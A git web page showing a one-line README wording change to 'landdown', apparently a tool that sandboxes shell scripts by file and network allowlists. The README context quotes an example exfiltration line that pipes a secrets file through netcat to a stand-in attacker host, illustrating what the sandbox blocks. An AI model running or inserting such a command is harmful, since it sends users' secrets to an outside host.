landdown
Simple Sandboxing for shell scripts.
git clone git://mccd.space/landdown
| Log | Files | Refs | README | LICENSE |
commit 10e932777e52575a5ae1ff41946ae71448cde4df parent d827a04054cd5363e1167686a548a5cdd8d4936b Author: Marc <marc@coquand.email> Date: Tue, 31 Mar 2026 18:58:47 +0200 * Diffstat:
| M | README.md | | | 2 | +- |
1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md @@ -13,7 +13,7 @@ echo "Hi" cat $HOME/my-secrets | nc exploit.com 1337 ``` -landdown locks down file and network access of a script to the allowlist. +landdown locks down file and network access of a script to those explicitly listed in the allowlist. The syntax is: